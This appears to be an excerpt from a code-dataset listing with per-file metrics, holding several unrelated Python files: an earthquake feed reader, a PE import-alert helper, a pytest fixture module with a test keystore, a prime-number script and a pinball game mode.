| 17.25 | 42 | 0.690821 | 26 | 207 | 5.423077 | 0.576923 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188406 | 207 | 11 | 43 | 18.818182 | 0.839286 | 0 | 0 | 0 | 0 | 0 | 0.009662 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3129453a0038e24bbee80e8d29bce23d328268df | 4,114 | py | Python | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | quake_reporter/quake_datafeed.py | shandozer/quake_reporter | 4e1eed5180b2f7dc3662b61ef32ef0b69c0fae01 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
__author__ = Shannon T. Buckley, 10/8/16
Python 2.7.x
"""
import json
import urllib2
import datetime
import argparse
VERSION = '0.2.1'
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-m', '--magnitude', action="store", type=float,
help='Please enter minimum magnitude desired: 1.0, 2.5, or 4.5', default=2.5)
parser.add_argument('-t', '--timeframe', action="store", choices=['hour', 'day', 'week', 'month'],
help='Collect data over the last hour, day, week, or month.')
parser.add_argument('-s', '--savejson', action="store_true",
help='Use this flag to save output to a .json')
return parser
def get_data_from_api(url):
page = urllib2.urlopen(url)
data = page.read()
return data
def save_json_data(data, req_details):
with open('quake_request_{}_{:%Y_%m_%d_%H:%M}.json'.format(req_details, datetime.datetime.now()), 'wb') as f:
json.dump(data, f)
def print_results(data, magnitude):
json_data = json.loads(data)
if 'title' in json_data['metadata']:
print json_data['metadata']['title']
count = json_data['metadata']['count']
print '\n--> {} events found in the {}\n'.format(str(count), json_data['metadata']['title'].split(', ')[1])
tsunami_quakes = [quake for quake in json_data['features'] if quake['properties']['tsunami'] == 1]
tsunami_count = len(tsunami_quakes)
if tsunami_count > 0:
print "\t{} of these caused TSUNAMI\n".format(tsunami_count)
sorted_json = sorted(json_data['features'], key=lambda k: k['properties'].get('time', 0), reverse=True)
for i in sorted_json:
print '*' * 18 + '\n'
if i['properties']['time']:
local_quake_time = i['properties']['time']
quake_date = datetime.datetime(1970, 1, 1) + datetime.timedelta(milliseconds=local_quake_time)
print 'Date of Quake: {}'.format(quake_date.strftime('%m-%d-%Y %H:%M:%S'))
time_since_quake = datetime.timedelta() - datetime.timedelta(days=-quake_date.day,
hours=quake_date.hour,
minutes=quake_date.minute,
seconds=quake_date.second)
if i['properties']['tsunami'] == 1:
print "\n\t_/*~~~ TSUNAMI CREATED! ~~~*\_\n"
if i['properties']['mag']:
print '%2.1f' % i['properties']['mag'] + ',', i['properties']['place'], '\n'
print 'Depth: ' + str(i['geometry']['coordinates'][2]) + 'km'
print '*' * 20
def main():
parser = get_parser()
args = parser.parse_args()
intro_statement = '\n\nSearching for Global Earthquake Events'
if args.timeframe:
t = args.timeframe
intro_statement += ' within the last {}...'.format(t)
else:
intro_statement += ' (No timespan selected, using default: 1 week)'
t = 'week'
print intro_statement
if args.magnitude:
mag = args.magnitude
print '\nMagnitude requested: {}'.format(mag)
if mag >= 4.5:
mag = 4.5
elif mag > 2.5:
mag = 2.5
else:
mag = 1.0 # anything less than 2.5 gets the 1.0+ range
else:
print '\nNo Magnitude requested, using default... (2.5+)'
mag = 2.5 # a medium sized default
# Now grab your data
api_url = 'http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/{}_{}.geojson'.format(mag, t)
try:
data = get_data_from_api(api_url)
except urllib2.URLError:
print '\nUH OH! We were unable to extract any data! \n\n\t-->Check your Internet/WiFi Access? '
exit(1)
if data and args.savejson:
request_params = '{}mag-1{}'.format(mag, t)
save_json_data(data, request_params)
elif data:
print_results(data, mag)
if __name__ == '__main__':
main()
| 25.395062 | 113 | 0.564657 | 518 | 4,114 | 4.337838 | 0.368726 | 0.032043 | 0.028482 | 0.012461 | 0.006231 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021103 | 0.285853 | 4,114 | 161 | 114 | 25.552795 | 0.743703 | 0.025523 | 0 | 0.059524 | 0 | 0.02381 | 0.251521 | 0.009888 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
312a5215e0e355ad2b4d5e01dca1809280fd23f6 | 647 | py | Python | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | null | null | null | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | null | null | null | peframe/modules/apialert.py | ki1556ki/MJUOpenSource | 4087db825bbc7c460f8275428703e5c7066a84ae | [
"MIT"
] | 1 | 2020-07-14T03:39:06.000Z | 2020-07-14T03:39:06.000Z | # -*- coding: utf-8 -*-
# json 형식 사용을 위한 임폴트
import json
# get함수, 각각의 반복문을 통해 apialert_found안에 문자열 삽입후 리스트형식으로 정렬하여 리턴값 반환.
def get(pe, strings_match):
alerts = strings_match['apialert']
apialert_found = []
# pe에 DIRECTORY_ENTRY_IMPORT라는 변수가 있는지 확인하여 있으면 참 없으면 거짓.
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
for lib in pe.DIRECTORY_ENTRY_IMPORT:
for imp in lib.imports:
for alert in alerts:
if alert: # remove 'null'
# imp.name의 문자열안에 alert의 문자열이 있을경우 apialert_found안의 맨뒤에 imp.name을 넣음
if str(imp.name).startswith(alert):
apialert_found.append(imp.name)
return sorted(set(apialert_found))
| 32.35 | 75 | 0.693972 | 98 | 647 | 4.44898 | 0.663265 | 0.08945 | 0.073395 | 0.100917 | 0.114679 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001965 | 0.213292 | 647 | 19 | 76 | 34.052632 | 0.854617 | 0.374034 | 0 | 0 | 0 | 0 | 0.079156 | 0.058047 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
312bfac4cf2875d133c13b3a00e0ae85f3c76c44 | 2,084 | py | Python | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | Ninjagod1251/ape | 9b40ef15f25362ddb83cb6d571d60cab041fce4a | [
"Apache-2.0"
] | null | null | null | import shutil
from pathlib import Path
from tempfile import mkdtemp
import pytest
from click.testing import CliRunner
import ape
# NOTE: Ensure that we don't use local paths for these
ape.config.DATA_FOLDER = Path(mkdtemp()).resolve()
ape.config.PROJECT_FOLDER = Path(mkdtemp()).resolve()
@pytest.fixture(scope="session")
def config():
yield ape.config
@pytest.fixture(scope="session")
def data_folder(config):
yield config.DATA_FOLDER
@pytest.fixture(scope="session")
def plugin_manager():
yield ape.networks.plugin_manager
@pytest.fixture(scope="session")
def accounts():
yield ape.accounts
@pytest.fixture(scope="session")
def compilers():
yield ape.compilers
@pytest.fixture(scope="session")
def networks():
yield ape.networks
@pytest.fixture(scope="session")
def chain():
yield ape.chain
@pytest.fixture(scope="session")
def project_folder(config):
yield config.PROJECT_FOLDER
@pytest.fixture(scope="session")
def project(config):
yield ape.Project(config.PROJECT_FOLDER)
@pytest.fixture
def keyparams():
# NOTE: password is 'a'
return {
"address": "7e5f4552091a69125d5dfcb7b8c2659029395bdf",
"crypto": {
"cipher": "aes-128-ctr",
"cipherparams": {"iv": "7bc492fb5dca4fe80fd47645b2aad0ff"},
"ciphertext": "43beb65018a35c31494f642ec535315897634b021d7ec5bb8e0e2172387e2812",
"kdf": "scrypt",
"kdfparams": {
"dklen": 32,
"n": 262144,
"r": 1,
"p": 8,
"salt": "4b127cb5ddbc0b3bd0cc0d2ef9a89bec",
},
"mac": "6a1d520975a031e11fc16cff610f5ae7476bcae4f2f598bc59ccffeae33b1caa",
},
"id": "ee424db9-da20-405d-bd75-e609d3e2b4ad",
"version": 3,
}
@pytest.fixture
def temp_accounts_path(config):
path = Path(config.DATA_FOLDER) / "accounts"
path.mkdir(exist_ok=True, parents=True)
yield path
if path.exists():
shutil.rmtree(path)
@pytest.fixture
def runner(project):
yield CliRunner()
| 21.265306 | 93 | 0.65739 | 217 | 2,084 | 6.253456 | 0.410138 | 0.114959 | 0.119381 | 0.165807 | 0.238025 | 0.081061 | 0 | 0 | 0 | 0 | 0 | 0.101778 | 0.21737 | 2,084 | 97 | 94 | 21.484536 | 0.730227 | 0.035509 | 0 | 0.181818 | 0 | 0 | 0.216741 | 0.133533 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.015152 | 0.287879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
312c17d992442c57e3032d03093f0ff6832854f9 | 1,053 | py | Python | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/576543_Prime_Number_Generator_Checker/recipe-576543.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | #
# prime number generator
# This program gets two number as input
# and prints
# Prime numbers in the range
# Actual number of primes in the range
# and Estimation based on formula
# n
# pi(n)= -------
# log(n)
# pi(n)=number of primes less than n
#
from math import *
def isPrime(n):
if n%2==0 and n!=2:return False #if number is EVEN AND it is NOT 2
k = n**0.5 ; m = ceil(k) #if number is PERFECT SQUARE
if k==m:return False
for i in xrange(3,int(m),2): #divisibility test ODDS ONLY
if n%i==0:return False
return True #otherwise it is PRIME
if __name__=='__main__':
s = input('Enter Start: ')
e = input('Enter End: ')
s|=1 #if s%2==0:s+=1 # ODDS only
list = [x for x in range(s,e,2) if isPrime(x)]
print list,'\n',len(list),'\n',int(ceil(e/log(e)-s/log(s)))
#prints list of primes , length of list , estimate using the formula
| 30.970588 | 73 | 0.531814 | 165 | 1,053 | 3.345455 | 0.442424 | 0.043478 | 0.036232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020438 | 0.349478 | 1,053 | 33 | 74 | 31.909091 | 0.785401 | 0.474834 | 0 | 0 | 0 | 0 | 0.071295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
31305c3885e35daac8ecf91b5ede410dc7a3d63d | 5,497 | py | Python | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | my_modes/ChaseLoop.py | mjocean/T2Game | d85d1a9b9adb1e3836548ea60befac02b0907f6f | [
"MIT"
] | null | null | null | import procgame.game
from procgame.game import AdvancedMode
import logging
class ChaseLoop(procgame.game.AdvancedMode):
"""
Example of T2 "Chase Loop" functionality
(described in the rules PDF on page J)
TODO: Sound effects, other visual feedback??
"""
def __init__(self, game):
super(ChaseLoop, self).__init__(game=game, priority=30, mode_type=AdvancedMode.Game)
# useful to set-up a custom logger so it's easier to track debugging messages for this mode
self.logger = logging.getLogger('ChaseLoop')
# the names of the progress lamps as a list for easier code
# via indexing, later
self.chase_lamps = ["twofiftyK", "fivehunK", "sevenfiftyK",
"oneMil", "threeMil", "fiveMil"]
self.collected = 0 # the number the player already has
self.loop_seq = [False, False, False, False]
self.awards = [250000, 500000, 750000, 1000000, 3000000, 5000000] # the list of awards
pass
def evt_player_added(self, player):
player.setState('chase_current',0)
def evt_ball_starting(self):
self.cancel_delayed(name="disabler")
self.mid_switches = [False, False, False]
self.collected = 0 # progress resets on new ball
self.sync_lamps_to_progress()
self.loop_seq = [False, False, False, False]
def evt_ball_ending(self, (shoot_again, last_ball)):
self.cancel_delayed(name="disabler")
def debug(self):
# self.logger.info("escL: %d, escH: %d, clH:%d, clL:%d" % (self.game.switches.escapeL.hw_timestamp, self.game.switches.escapeH.hw_timestamp, self.game.switches.chaseLoopHigh.hw_timestamp, self.game.switches.chaseLoopLow.hw_timestamp))
self.logger.info("collected = %d" % (self.collected))
def sw_chaseLoopLow_active(self, sw):
self.seq_handler(0)
def sw_chaseLoopHigh_active(self, sw):
self.seq_handler(1)
def sw_escapeH_active(self, sw):
self.seq_handler(2)
def sw_escapeL_active(self, sw):
if(self.seq_handler(3)):
# loop complete
self.chase_loop_award()
self.loop_seq = [False, False, False, False]
def seq_handler(self, num):
self.cancel_delayed(name="clear_%d" % num)
# if a previous switch is False, no sequence
if(False in self.loop_seq[0:num]):
self.logger.info("saw later switch -- sequence destroyed")
for i in range(0,num):
self.reset_switch_memory(i)
self.loop_seq[num] = False
self.logger.info("hit %d | Sequence: %s" % (num, self.loop_seq))
return False
self.loop_seq[num] = True
# clear later switches
for i in range(num+1,4):
self.reset_switch_memory(i)
self.logger.info("hit %d | Sequence: %s" % (num, self.loop_seq))
if(num!=3):
self.delay(name="clear_%d" % num, delay=4.0, handler=self.reset_switch_memory, param=num)
return True
def reset_switch_memory(self, switch_num):
self.cancel_delayed(name="clear_%d" % switch_num)
if(self.loop_seq[switch_num] == False):
return # nothing to do
self.loop_seq[switch_num] = False
self.logger.info("RESET %d | Sequence: %s" % (switch_num, self.loop_seq))
def OFF_sw_escapeL_active(self, sw):
self.debug()
if(self.game.switches.chaseLoopLow.hw_timestamp == None):
return procgame.game.SwitchContinue
if (((self.game.switches.escapeL.hw_timestamp - self.game.switches.chaseLoopLow.hw_timestamp) < 2000) and
(self.game.switches.escapeL.hw_timestamp > self.game.switches.escapeH.hw_timestamp) and
(self.game.switches.escapeH.hw_timestamp > self.game.switches.chaseLoopHigh.hw_timestamp) and
(self.game.switches.chaseLoopHigh.hw_timestamp > self.game.switches.chaseLoopLow.hw_timestamp)):
self.chase_loop_award()
return procgame.game.SwitchStop
else:
return procgame.game.SwitchContinue
def chase_loop_award(self):
self.sync_lamps_to_progress(special=self.collected)
self.game.displayText("Chase Loop " + str(self.awards[self.collected]))
self.game.score(self.awards[self.collected])
if(self.collected < len(self.chase_lamps)-1):
self.collected += 1
else:
# already got them all
pass
self.debug()
self.delay(name="lamp_sync", delay=1.0, handler=self.sync_lamps_to_progress)
def disable_progress_lamps(self):
for l in self.chase_lamps:
self.game.lamps[l].disable()
def set_lamp(self, lamp_name, state):
l = self.game.lamps[lamp_name]
if(state==0):
l.disable()
elif(state==1):
l.enable()
elif(state==2):
l.schedule(0xff00ff00)
elif(state==3):
l.schedule(0xf0f0f0f0)
def sync_lamps_to_progress(self, special=None):
self.cancel_delayed(name="lamp_sync")
for i in range(0, len(self.chase_lamps)):
l_state = 0
if(special is not None and i==special):
l_state=3
elif(self.collected>i):
l_state = 1
elif(self.collected==i):
l_state = 2
self.logger.info("setting " + self.chase_lamps[i] + " to " + str(l_state))
self.set_lamp(self.chase_lamps[i], l_state)
| 36.646667 | 242 | 0.62525 | 721 | 5,497 | 4.603329 | 0.238558 | 0.043387 | 0.062669 | 0.040072 | 0.360651 | 0.288942 | 0.207894 | 0.180476 | 0.153058 | 0.137993 | 0 | 0.020398 | 0.259778 | 5,497 | 149 | 243 | 36.892617 | 0.795281 | 0.108059 | 0 | 0.201923 | 0 | 0 | 0.056775 | 0 | 0 | 0 | 0.004221 | 0.006711 | 0 | 0 | null | null | 0.019231 | 0.028846 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.